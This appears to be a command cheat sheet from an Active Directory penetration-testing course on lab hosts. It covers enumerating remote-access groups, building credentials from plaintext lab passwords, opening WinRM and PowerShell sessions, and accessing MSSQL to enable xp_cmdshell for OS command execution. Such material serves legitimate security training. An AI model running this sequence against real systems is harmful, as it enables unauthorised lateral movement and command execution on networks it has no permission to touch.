Privileged Access

Privileged Access

1. Enumerate Remote Desktop Users Group

Command:

Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"

• Description: PowerView-based tool used to enumerate the Remote Desktop Users group on a Windows target (ACADEMY-EA-MS01).

---

2. Enumerate Remote Management Users Group

Command:

Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"

• Description: PowerView-based tool used to enumerate the Remote Management Users group on a Windows target (ACADEMY-EA-MS01).

---

3. Create a Secure Password Variable

Command:

$password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force

• Description: Creates a variable ($password) set to the password (Klmcargo2) of a user.

---

4. Create a Credential Object

Command:

$cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)

• Description: Creates a variable ($cred) set to the username (forend) and password ($password) of a target domain account.

---

5. Establish a PowerShell Session

Command:

Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential $cred

• Description: Uses Enter-PSSession to establish a PowerShell session with a target over the network (ACADEMY-EA-DB01). Authenticates using credentials created earlier ($cred & $password).

---

6. Establish a PowerShell Session Using Evil-WinRM

Command:

evil-winrm -i 10.129.201.234 -u forend

• Description: Used to establish a PowerShell session with a Windows target from a Linux-based host using WinRM.

---

7. Import PowerUpSQL

Command:

Import-Module .\PowerUpSQL.ps1

• Description: Used to import the PowerUpSQL tool.

---

8. Enumerate SQL Server Instances

Command:

Get-SQLInstanceDomain

• Description: PowerUpSQL tool used to enumerate SQL server instances.

---

9. Query SQL Server Version

Command:

Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'

• Description: PowerUpSQL tool used to connect to an SQL server and query its version.

---

10. Display mssqlclient.py Options

Command:

mssqlclient.py

• Description: Impacket tool used to display the functionality and options provided by mssqlclient.py from a Linux-based host.

---

11. Connect to MSSQL Server

Command:

mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth

• Description: Impacket tool used to connect to an MSSQL server from a Linux-based host.

---

12. Display SQL Client Options

Command:

SQL> help

• Description: Used to display mssqlclient.py options once connected to an MSSQL server.

---

13. Enable xp_cmdshell

Command:

SQL> enable_xp_cmdshell

• Description: Used to enable the xp_cmdshell stored procedure, allowing execution of OS commands via the database.

---

14. Enumerate System Rights

• Command:

xp_cmdshell whoami /priv

• Description: Used to enumerate rights on a system using xp_cmdshell.